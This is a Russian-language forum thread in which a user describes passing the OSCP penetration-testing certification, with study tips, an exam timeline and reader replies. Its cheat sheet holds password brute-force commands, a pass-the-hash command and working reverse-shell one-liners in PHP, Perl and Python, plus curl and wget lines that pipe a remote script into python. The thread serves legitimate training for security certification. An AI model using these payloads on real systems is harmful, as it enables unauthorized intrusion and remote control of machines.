• Курсы Академии Кодебай, стартующие в мае - июне, от команды The Codeby

    1. Цифровая криминалистика и реагирование на инциденты
    2. ОС Linux (DFIR) Старт: 16 мая
    3. Анализ фишинговых атак Старт: 16 мая Устройства для тестирования на проникновение Старт: 16 мая

    Скидки до 10%

    Полный список ближайших курсов ...

Как я сдавал OSCP?!

iloveyou

Green Team
17.04.2020
36
1
BIT
0
для тех кто хочет облегчить себе жизнь с данным экзаменом:

1)

и мои ресы.)

2 )

Просто тонны нефти тебе, добрый человек! Золотая инфа!
Горю желанием тоже пройти сей трудный путь. Осталось только в голове обрисовать четкий план и понять за что хвататся в первую очередь.
 

hubcap

One Level
31.08.2019
1
1
BIT
0
PWK 2.0 Мне вообще гипер "повезло". Я курс брал старый а экзамен уже сдавал новый.
Экзамен они не подгоняли под новый курс, по крайней мере на текущий день. Где-то в видосе по ссылке это будет упомянуто вскользь. Возможно, какие-то минорные изменения. В моей первой (неудачной) попытке я тоже повышал привилегии на одной из машин относительным свежачком с hackerone (случайно наткнулся совершенно). Но врядле это intended way.
 
Последнее редактирование:
  • Нравится
Реакции: iloveyou

SooLFaa

Platinum
15.07.2016
898
1 559
BIT
21
Экзамен они не подгоняли под новый курс, по крайней мере на текущий день. Где-то в видосе по ссылке это будет упомянуто вскользь. Возможно, какие-то минорные изменения. В моей первой (неудачной) попытке я тоже повышал привилегии на одной из машин относительным свежачком с hackerone (случайно наткнулся совершенно). Но врядле это intended way.
Возможно. Но факт остается фактом. Одну из привилегий я взял прям годовалой уязой. И ничего из тех кейсов о которых мне намекали я не встретил.
 

.Method

Grey Team
17.12.2018
255
63
BIT
0
Привет, мой друг. Вот и я решил черкануть тебе пару строк об уже нашумевшем экзамене OSCP. Думаю, если ты читаешь эту тему, то уже знаешь о чем речь, но на всякий случай, если привел тебя сюда "Random", напомню,
OSCP - Offensive Security Certified Professional, знаменитый международный сертификат по наступательной безопасности, который подтверждает квалификацию пентестера. Его особенность в том, что его нельзя сдать "заучив тесты", только реальная практика пентеста, только хардкор. В этой статье я расскажу о том, как я прошел свой путь.

Чтобы не повторяться приведу тебе полезные ссылки:
Прочитал и готов идти дальше?! - ОК.
Почему то я уверен, раз ты это читаешь, то и ты хочешь войти в ряды OSCP'шников?!

На самом деле OSCP - это сертификат, а сам курс называется PWK (Pentest with Kali Linux). Тебе даются видеоматериалы и PDF. А так же доступ к лаборатории на оплаченный тобой период.
Так же дают уже готовый образ Kali и после оплаты, назначаешь дату, когда готов приступить учиться.

Надеюсь у тебя не составит труда зарегистрироваться.

Прохождение лаборатории...
Вот тебе несколько полезных советов.
1) В OSCP много Rabbit Holes (уязвимости или вектора, которые ведут в никуда)
2) Почти всегда эксплоит не работает из коробки и почти всегда, что то надо поправить. (обычно, это незначительная деталь)
3) Если nmap тебе показал только один порт 22 или 3389 вероятнее всего креды находятся на другой машине (никогда не забывай про POST enum на всех машинах)
4) Тачки из Big4 не такие уж и сложные: Humble, Ghost, Sufference, Pain
5) Не забывай про разрядность машины
6) Помни про WAF, disable functions, bad chars и другое...
7) Запусти nmap -sV -sC -p- -oN res.nmap на всю доступную сеть сразу
8) Почти всегда, если на машине есть gcc, то существует кернел сплоит.
9) Абсолютно овладей техникой передачи файлов, работай консолью cmd,bash и старайся не использовать metasploit.

А вот эти заметочки тебе помогут:
  • Брутилка RDP
ncrack -vv --user <username>-P PASS_FILE.txt rdp://<ip>
  • Брутилка SNMP
hydra -P PASS_FILE.txt -v <ip> snmp
  • Брутилка SSH
hydra -l root -P password-file.txt <ip> ssh
  • Использование Pass-The-Hash через SMB
pth-winexe -U administrator% //<IP> cmd
  • Настройка TFTP для передачи файлов
Сервер
Код:
sudo apt install -y atftpd
sudo sed -e 's/^USE_INETD=true/USE_INETD=false/g' -i /etc/default/atftpd
sudo systemctl enable atftpd
sudo systemctl restart atftpd
Клиент
tftp 10.11.0.243 GET win_32_shell.exe
  • Компиляция эксплоитов, обращай всегда внимание на разрядность машины.
gcc -m32 -Wl,--hash-style=both -o exp exploit.c
  • Reverse connect через php
<?php echo passthru("bash -i >& /dev/tcp/<ip>/443 0>&1"); ?>
  • Reverse connect через perl
use Socket;$i="<ip>";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};
  • Reverse connect через python
Код:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<IP>",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
  • Бывает такое, что нет возможности прокинуть файл, тогда можно выполнить python сценарий через http со своей машины
curl http://<IP>/linuxprivchecker.py | python
  • А если недоступен curl
wget -O - -o /dev/null http://10.11.0.243/linuxprivchecker.py | python
  • TTY Shell - нужен, чтобы получить более интерактивную оболочку, когда сессия получены через nc
python -c ‘import pty; pty.spawn(“/bin/sh”)’
  • Не забывай проверять /etc/fstab
  • sudo -l - всегда проверяй текущие правила sudo
Как ты видишь тут нет хинтов, предлагаю тебе пройти лабораторию самому. Кстати, если ты напишешь отчет как взломал не менее 10 машин, то тебе начислят ещё 5 баллов на экзамене.
Вообщем, путь в лаборатории очень увлекателен и рекомендую тебе пройти его, я, например, решил 53 из 55 машин.

Экзамен:
Итак, самое интересное, экзамен. Ты прошел лабу, получил ссылку и назначил экзамен, я тобой горжусь.
Обязательно купи пару банок энергетика.
В экзамене у тебя будет 5 машин, которые надо взломать за 24 часа.
1 - машина за 10 балов
2 - машины за 20 балов
2 - машины за 25 балов
Причем одна из машин будет на Buffer Over Flow. Не сказать, что она сложная. Просто внимательно изучи материал PDF на эту тему и проблем не будет.

Мой экзамен начался в 12:00. Но рекомендую придти по раньше. За Вами все 24 часа будет следить камера и смотрящему надо провести подготовку с вами. Он попросит осмотреть комнату, запустить скрипты, показать все выходы и входы. На экзамене можно выходить, но надо сообщать проктору.

Как я сдавал экзамен?!
Я сначала запустил nmap на 4 машины на все порты с опцией -sC и -sV, убрал в screen, стал решать бинарщину.
Бинарщина со всеми скринами пала за 30 минут, так как я наизусть её отточил. И вот получен первый флаг.
Следующей поддалась машина за 10 балов, причем, меня удивило, что уязвимость была достаточно свежая. Это говорит о том, что Offensive Security обновляют экзамен. Поэтому будь в тренде и следи за громкими исследованиями. Итого в кармане 35 балов за час. (Минимум для сдачи надо 75)

Следующие два часа я ломал машину за 20. Долго не мог понять, почему не работает эксплоит. Оказалось, что ответ лежал на поверхности. Внес нужные правки в эксплоит и пала машина за 20. Самое интересное тут, что Администратора на машину я взял просто угадав эксплоит. Но воспроизводил и подбирал его вручную, не используя сторонние тулзы. Вникнув полностью в атаку.

Осталась машины за 20 и 25 балов.
Пользователя на машине за 25 я взял тоже достаточно быстро, хотя и пришлось переписать значительную часть эксплоита.
А вот в машине за 20 пришлось попотеть...
Чтобы её взять нужно было связать в единую цепочку несколько уязвимостей, но в итоге поддалась и она.

Сделав все скрины, я отправился на 4 часовой сон....

Прозвенел будильник за 2 часа до конца экзамена. Более менее поспавшей головой я ещё раз взглянул на всё. Подработал скриншоты и завершил экзамен. Далее стал читать требования к отчету и тут отнесись очень внимательно, несоблюдение требований лишит тебя заветного сертификата.

Отчет подготовил за 6 часов и отправил на проверку...
Через 5 дней мне сообщили, что я успешно сдал экзамен и теперь являюсь OSCP.
Это было суперувлекательное путешествие. Проверка на стойкость. OSCP научил не сдаваться и искать решение до конца, смотреть на системы под разными углами.

Наверное, тебе интересно, мой бэкграунд.
1) Я отлично владел кодовой базой и знал все вектора на web.
2) Пол года я играл на HacKTheBox и набил ранг Guru.
3) Я читал много книг по сетям и прикладному "Хакингу".
4) Смотрел WriteUp'ы из CTF'ов и неплохо знал UNIX системы.
5) У меня был значительный опыт проведения пентестов.

OSCP не такой уж и сложный если подойти к вопросу подготовки ответственно. Уверен, что скоро ты расскажешь, как получил свой сертификат. Удачи и Try Harder.

Задавай свои вопросы!
CCNA Router And Switching
Компьютерные Сети
Современные операционные системы
Т.е этих книг будет достаточно для Сетей и ОС?
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!